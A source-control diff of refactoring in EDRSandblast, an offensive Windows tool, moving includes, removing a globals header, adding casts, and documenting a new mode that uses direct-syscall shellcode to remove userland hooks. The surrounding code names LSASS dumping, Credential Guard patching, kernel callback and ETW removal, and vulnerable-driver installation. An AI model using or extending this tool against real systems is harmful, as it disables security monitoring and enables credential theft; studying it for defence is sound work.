Cleaning up some code

EDRSandblast/EDRSandBlast.h

@@ -12,19 +12,18 @@
 #include <malloc.h>
 #include <assert.h>
 
-#include "Includes/Globals.h"
+#include "CredGuard.h"
-#include "Includes/CredGuard.h"
+#include "DriverOps.h"
-#include "Includes/DriverOps.h"
+#include "ETWThreatIntel.h"
-#include "Includes/ETWThreatIntel.h"
+#include "FileVersion.h"
-#include "Includes/FileVersion.h"
+#include "KernelCallbacks.h"
-#include "Includes/KernelCallbacks.h"
+#include "KernelMemoryPrimitives.h"
-#include "Includes/KernelMemoryPrimitives.h"
+#include "KernelPatternSearch.h"
-#include "Includes/KernelPatternSearch.h"
+#include "LSASSDump.h"
-#include "Includes/LSASSDump.h"
+#include "NtoskrnlOffsets.h"
-#include "Includes/NtoskrnlOffsets.h"
+#include "RunAsPPL.h"
-#include "Includes/RunAsPPL.h"
+#include "WdigestOffsets.h"
-#include "Includes/WdigestOffsets.h"
+#include "UserlandHooks.h"
-#include "Includes/UserlandHooks.h"
 
 typedef enum _START_MODE {
     dump,

EDRSandblast/EDRSandblast.c

@@ -38,6 +38,8 @@ Actions mode:\n\
 \t4               Loads an additional version of ntdll library into memory, and use the (hopefully\n\
 \t                unmonitored) version of NtProtectVirtualMemory present in this library to remove all\n\
 \t                present userland hooks.\n\
+\t5               Allocates a shellcode that uses a direct syscall to call NtProtectVirtualMemory,\n\
+\t                and uses it to remove all detected hooks\n\
 \n\
 Other options:\n\
 \n\
@@ -492,7 +494,7 @@ Other options:\n\
         status = UninstallVulnerableDriver();
         if (status == FALSE) {
             _tprintf(TEXT("[!] An error occured while attempting to uninstall the vulnerable driver\n"));
-            _tprintf(TEXT("[*] The service should be manually deleted: cmd /c sc delete %s\n"), serviceName);
+            _tprintf(TEXT("[*] The service should be manually deleted: cmd /c sc delete %s\n"), GetServiceName());
             lpExitCode = EXIT_FAILURE;
         }
         else {

EDRSandblast/EDRSandblast.vcxproj

@@ -125,7 +125,7 @@
       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <ConformanceMode>true</ConformanceMode>
       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
-      <AdditionalIncludeDirectories>Includes/</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>Includes\</AdditionalIncludeDirectories>
     </ClCompile>
     <Link>
       <SubSystem>Console</SubSystem>
@@ -174,7 +174,6 @@
     <ClInclude Include="EDRSandBlast.h" />
     <ClInclude Include="Includes\ETWThreatIntel.h" />
     <ClInclude Include="Includes\FileVersion.h" />
-    <ClInclude Include="Includes\Globals.h" />
     <ClInclude Include="Includes\KernelCallbacks.h" />
     <ClInclude Include="Includes\KernelMemoryPrimitives.h" />
     <ClInclude Include="Includes\KernelPatternSearch.h" />

EDRSandblast/EDRSandblast.vcxproj.filters

@@ -98,9 +98,6 @@
     <ClInclude Include="Includes\KernelCallbacks.h">
       <Filter>Header Files</Filter>
     </ClInclude>
-    <ClInclude Include="Includes\Globals.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
     <ClInclude Include="Includes\ETWThreatIntel.h">
       <Filter>Header Files</Filter>
     </ClInclude>

EDRSandblast/Includes/CredGuard.h

@@ -6,7 +6,6 @@
 #include <Psapi.h>
 #include <tlhelp32.h>
 
-#include "Globals.h"
 #include "WdigestOffsets.h"
 
 DWORD WINAPI disableCredGuardByPatchingLSASS(void);

EDRSandblast/Includes/DriverOps.h

@@ -11,8 +11,8 @@
 #include <aclapi.h>
 #include <Tchar.h>
 #include <stdio.h>
+#include <time.h>
 
-#include "Globals.h"
 
 #if !defined(PRINT_ERROR_AUTO)
 #define PRINT_ERROR_AUTO(func) (_tprintf(TEXT("[!] ERROR ") TEXT(__FUNCTION__) TEXT(" ; ") func TEXT(" (0x%08x)\n"), GetLastError()))

EDRSandblast/Includes/ETWThreatIntel.h

@@ -11,7 +11,6 @@
 #include <Tchar.h>
 #include <stdio.h>
 
-#include "Globals.h"
 #include "KernelMemoryPrimitives.h"
 #include "NtoskrnlOffsets.h"
 

EDRSandblast/Includes/Globals.h

@@ -1,9 +0,0 @@
-#pragma once
-
-extern union NtoskrnlOffsets ntoskrnlOffsets;
-
-extern union WdigestOffsets wdigestOffsets;
-
-//extern TCHAR* serviceName;
-
-extern TCHAR* serviceName;

EDRSandblast/Includes/KernelCallbacks.h

@@ -11,7 +11,6 @@
 #include <Tchar.h>
 #include <stdio.h>
 
-#include "Globals.h"
 #include "DriverOps.h"
 #include "KernelMemoryPrimitives.h"
 #include "NtoskrnlOffsets.h"

EDRSandblast/Includes/KernelMemoryPrimitives.h

@@ -12,7 +12,6 @@
 #include <Tchar.h>
 #include <stdio.h>
 
-#include "Globals.h"
 
 struct RTCORE64_MSR_READ {
     DWORD Register;

EDRSandblast/Includes/NtoskrnlOffsets.h

@@ -10,7 +10,6 @@
 #include <Windows.h>
 #include <Tchar.h>
 
-#include "Globals.h"
 #include "FileVersion.h"
 
 enum NtoskrnlOffsetType {

EDRSandblast/Includes/RunAsPPL.h

@@ -12,7 +12,6 @@
 #include <Tchar.h>
 #include <stdio.h>
 
-#include "Globals.h"
 #include "KernelMemoryPrimitives.h"
 #include "NtoskrnlOffsets.h"
 

EDRSandblast/Includes/WdigestOffsets.h

@@ -11,7 +11,6 @@
 #include <Windows.h>
 #include <Tchar.h>
 
-#include "Globals.h"
 #include "FileVersion.h"
 
 enum WdigestOffsetType {

EDRSandblast/LSASSProtectionBypass/RunAsPPL.c

@@ -14,7 +14,7 @@ DWORD64 GetSelfEPROCESSAddress(BOOL verbose) {
     // Open an handle to our own process.
     HANDLE selfProcessHandle = OpenProcess(SYNCHRONIZE, FALSE, currentProcessID);
     if (verbose) {
-        _tprintf(TEXT("[*] Self process handle: 0x%hx\n"), (USHORT)selfProcessHandle);
+        _tprintf(TEXT("[*] Self process handle: 0x%hx\n"), (USHORT)((ULONG_PTR)selfProcessHandle));
     }
 
 
@@ -72,7 +72,7 @@ DWORD64 GetSelfEPROCESSAddress(BOOL verbose) {
             _tprintf(TEXT("[*] Handle for the current process (PID: %hd): 0x%hx at 0x%I64x\n"), handleInfo.UniqueProcessId, handleInfo.HandleValue, (DWORD64)handleInfo.Object);
         }
 
-        if (handleInfo.HandleValue == (USHORT)selfProcessHandle) {
+        if (handleInfo.HandleValue == (USHORT)((ULONG_PTR)selfProcessHandle)) {
             _tprintf(TEXT("[+] Found the handle of the current process (PID: %hd): 0x%hx at 0x%I64x\n"), handleInfo.UniqueProcessId, handleInfo.HandleValue, (DWORD64)handleInfo.Object);
             returnAddress = (DWORD64)handleInfo.Object;
         }

EDRSandblast/Utils/DriverOps.c

@@ -42,7 +42,6 @@ BOOL ServiceAddEveryoneAccess(SC_HANDLE serviceHandle) {
 }
 
 DWORD ServiceInstall(PCTSTR serviceName, PCTSTR displayName, PCTSTR binPath, DWORD serviceType, DWORD startType, BOOL startIt) {
-    BOOL status = FALSE;
     SC_HANDLE hSC = NULL, hS = NULL;
 
     hSC = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_CONNECT | SC_MANAGER_CREATE_SERVICE);
@@ -179,7 +178,7 @@ BOOL ServiceUninstall(PCTSTR serviceName, DWORD attemptCount) {
 */
 
 static TCHAR* randString(TCHAR* str, size_t size) {
-    srand(time(0));
+    srand((unsigned int) time(0));
 
     const char charset[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789";
     if (size) {
@@ -192,7 +191,9 @@ static TCHAR* randString(TCHAR* str, size_t size) {
     return str;
 }
 
+
 TCHAR* serviceName;
+
 TCHAR* GetServiceName(void) {
     if (!serviceName || _tcslen(serviceName) == 0) {
         serviceName = calloc(SERVICE_NAME_LENGTH, sizeof(TCHAR));
@@ -216,11 +217,9 @@ void SetServiceName(TCHAR *newName, size_t szNewName) {
 }
 
 BOOL InstallVulnerableDriver(TCHAR* driverPath) {
-
     TCHAR* svcName = GetServiceName();
-    const TCHAR svcDesc[] = TEXT("");
 
-    DWORD status = ServiceInstall(serviceName, svcName, driverPath, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, TRUE);
+    DWORD status = ServiceInstall(svcName, svcName, driverPath, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, TRUE);
 
     if (status == 0x00000005) {
         _tprintf(TEXT("[!] 0x00000005 - Access Denied when attempting to install the driver - Did you run as administrator?\n"));